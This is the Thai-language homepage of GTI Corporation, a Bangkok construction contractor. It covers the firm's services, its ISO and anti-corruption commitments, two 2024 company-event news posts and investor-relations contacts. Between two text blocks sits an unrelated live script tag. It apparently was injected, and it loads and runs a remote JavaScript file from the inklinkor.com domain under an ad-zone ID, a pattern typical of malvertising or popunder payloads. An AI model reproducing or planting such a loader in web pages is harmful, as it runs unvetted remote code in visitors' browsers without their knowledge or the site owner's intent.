การพัฒนาอย่างยั่งยืน
สร้างงานคุณภาพ  สร้างความมั่นใจ สร้างคุณธรรม
จีทีไอ เปลี่ยนงานก่อสร้างให้เป็นเรื่องง่าย
ด้วยผลคุณภาพและความตรงต่อเวลา
ความเชี่ยวชาญกว่า 18 ปี
บริษัท จีทีไอ คอร์ปอร์เรชั่น จำกัด  ให้บริการธุรกิจรับเหมาก่อสร้างแบบครบวงจรมาด้วยความมุ่งมั่นสร้างคุณภาพด้วยประสบการณ์และความเชี่ยวชาญมาตลอดระยะกว่า 18 ปี
เป้าหมายในการสร้างธุรกิจที่ยั่งยืน
เรามุ่งเน้นในด้านการรักษาสิ่งแวดล้อม  โดยการกำกับดูแลกิจการที่แข็งแกร่งเพื่อประโยชน์ต่อสังคม
<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script '),'https://inklinkor.com/tag.min.js',6036526,document.body||document.documentElement)</script>
รู้จักกับ จีทีไอ
            “ยินดีต้อนรับสู่บริษัทของเรา ซึ่งเป็นผู้ให้บริการงานรับเหมาก่อสร้างซึ่งดำเนินงานมาตั้งแต่ปี 2548 เราพร้อมนำเสนอบริการที่หลากหลาย ตั้งแต่การออกแบบ งานโยธา งานไฟฟ้าและเครื่องกล งานไอที งานภาพและเสียง  ไปจนถึงงานระบบดิจิตอลต่างๆ 

            เรามีความพร้อมในการผลิตผลงานคุณภาพสูงและเกินความคาดหมายของลูกค้า  ทีมผู้เชี่ยวชาญที่มีประสบการณ์ของเราสามารถจัดการงานโครงการได้อย่างหลากหลาย ทุกแบบทุกขนาดแม้ว่าจะเป็นโครงการที่เต็มไปด้วยความซับซ้อน   ด้วยรูปแบบการทำงานอย่างใกล้ชิดกับลูกค้าของเราและพร้อมปรับเปลี่ยนตามทุกความต้องการ  เพื่อให้เราได้เข้าใจความต้องการและความพึงพอใจของลูกค้าเราให้มากที่สุด

            นอกจากแนวทางการมุ่งมั่นที่จะยกระดับมาตรฐานและคุณภาพเพื่อให้เทียบเท่าในระดับสากล  เรายังให้ความสำคัญและความใส่ใจให้พนักงานในองค์กรทุกคนมีส่วนร่วมที่จะช่วยลดผลกระทบต่อสิ่งแวดล้อมในทุกด้าน  โดยการวางแนวทางการเข้าสู่กระบวนการลดปริมาณก๊าซเรือนกระจก (ISO 14064-1) หรือการปลูกฝังจิตสำนึกด้วยกระบวนสร้างมาตรฐานการจัดการสิ่งแวดล้อม (ISO 14001)  ภายในองค์กร ตลอดจนการให้ความสำคัญในเรื่องระบบมาตรฐานการจัดการ อาชีวอนามัย และความปลอดภัย (ISO 45001: 2018)  เพื่อช่วยพัฒนาชีวิตของ และพร้อมมอบความปลอดภัยสูงสุดให้กับพนักงานของเรา

            และเพื่อการสร้างความเชื่อมั่นในเชิงธุรกิจอย่างยั่งยืน เราพร้อมเข้าเป็นแนวร่วมการต่อต้านคอรัปชั่นไทย (CAC :  Thai Private Sector Collective Action Against Corruption) เพื่อ ยกระดับมาตรฐานการดำเนินงานที่สามารถควบคุมความเสี่ยงด้านคอร์รัปชันและพื่อให้มีประสิทธิภาพและความโปร่งใสมากยิ่งขึ้น

            เราพร้อมตอบโจทย์และตอบสนองในทุกความต้องการ  และหวังว่าจะมีโอกาสได้เป็นส่วนหนึ่งในการส่งมอบผลงานที่มีคุณภาพและสร้างประสบการณ์ใหม่ๆ ให้แก่ลูกค้าทุกคน เพราะการให้บริการลูกค้าที่เป็นเลิศคือความภูมิใจของเรา”

ข่าวสารและกิจกรรม
โพสต์ : 17 เมษายน พ.ศ. 2567
บริษัท จีทีไอ คอร์ปอร์เรชั่น จำกัด จัดกิจกรรม "สืบสานวัฒนธรรมประเพณีสงกรานต์ประจำปี 2567"
เมื่อวันพฤหัสบดีที่ 11 เมษายน 2567, บริษัท จีทีไอ คอร์ปอร์เรชั่น จำกัด ได้ดำเนินการจัดกิจกรรม "สืบสานวัฒนธรรมประเพณีสงกรานต์ประจำปี 2567" โดยได้รับเกียรติจาก คุณสมพล ยศวิริยะพาณิชย์ ดำรงตำแหน่งประธานเจ้าหน้าที่บริหาร และคุณเกรียงศักดิ์ เหล่าอาภาสุวงศ์ ดำรงตำแหน่งประธานเจ้าหน้าที่บริหารการเงิน ร่วมเป็นประธานในพิธี นำสรงน้ำพระพุทธรูป พร้อมกล่าวคำอวยพรเนื่องในเทศกาลสงกรานต์ แก่คณะผู้จัดการ และพนักงานทุกคน
บรรยากาศภายในงานเต็มไปด้วยความสนุกสนาน และรอยยิ้ม อีกทั้งยังคงรักษา สืบทอดประเพณีอันดีงามในวันสงกรานต์ ซึ่งถือเป็นวันขึ้นปีใหม่ของไทยที่ยึดถือปฏิบัติสืบเนื่องกันมาแต่โบราณ มีกิจกรรมที่สะท้อนความเป็นไทย มาอย่างต่อเนื่อง อาทิ การรดน้ำขอพรจากผู้ใหญ่เพื่อความเป็นสิริมงคลแก่ชีวิต ซึ่งเป็นการแสดงออกถึงความกตัญญูกตเวที และเป็นแบบอย่างที่ดีแก่คนรุ่นหลังต่อไป
ดูรายละเอียด
โพสต์ : 2 กุมภาพันธ์ พ.ศ. 2567
บริษัท จีทีไอ คอร์ปอร์เรชั่น จำกัด จัดงานทำบุญบริษัทฯ เสริมความเป็นสิริมงคล และความเจริญรุ่งเรือง ในการดำเนินธุรกิจ

 

เมื่อวันที่ 24 มกราคม 2567  บริษัท จีทีไอ คอร์ปอร์เรชั่น จำกัด ("GTI") จัดงานทำบุญบริษัทฯ นำโดย คณะผู้บริหารบริษัทฯ คุณสมพล ยศวิริยะพาณิชย์ ประธานเจ้าหน้าที่บริหาร คุณเกรียงศักดิ์ เหล่าอาภาสุวงศ์ ประธานเจ้าที่บริหารการเงิน และคุณทราทิต พงศ์อรเดช ประธานเจ้าหน้าที่บริหารกลยุทธ์ฯ รวมทั้งแขกผู้มีเกียรติ และบุคลากรของบริษัทฯ ได้เข้าร่วมประกอบพิธีอันศักดิ์สิทธิ์  เพื่อความเป็นสิริมงคลในการดำเนินธุรกิจอย่างราบรื่น และสร้างขวัญกำลังใจในการปฏิบัติงานให้กับพนักงานทุกคน

ดูรายละเอียด
รางวัล
เราจะเป็นชุมชนของผู้สร้างที่เป็นศูนย์กลางของผู้นำ ในแต่ละสาขาอาชีพที่มาด้วยกัน พร้อมที่จะอยู่ร่วมกัน ทำงานร่วมกัน ช่วยเหลือกัน และร่วมรับผิดชอบในการทำงานให้เกิดประโยชน์สูงสุดและยั่งยืนแก่ชุมชนของเรา ให้กับสังคมรอบตัวเรา
อ่านเพิ่มเติม
สมัครงาน
เพราะคุณคือแรงผลักดันสำคัญที่จะก้าวไปข้างหน้าพร้อมกับเรา...
นักลงทุนสัมพันธ์
หน้าหลักนักลงทุนสัมพันธ์
ข้อมูลบริษัท
ข้อมูลทางการเงิน
ข้อมูลผู้ถือหุ้น
รายงานประจำปี / แบบ 56-1
การพัฒนาสู่ความยั่งยืน
ข้อมูลนำเสนอแบบมัลติมีเดีย
บทวิเคราะห์
ข้อมูลราคาหลักทรัพย์
ห้องข่าวประชาสัมพันธ์
สอบถามข้อมูล
ติดต่อนักลงทุนสัมพันธ์
โทร : 02-1080053
แฟกซ์ : -
อีเมล : Contact@gti-corporation.com
โซเชียล มีเดีย :
232 อมรพันธ์ 4 แขวงลาดยาว เขตจตุจักร กรุงเทพมหานคร 10900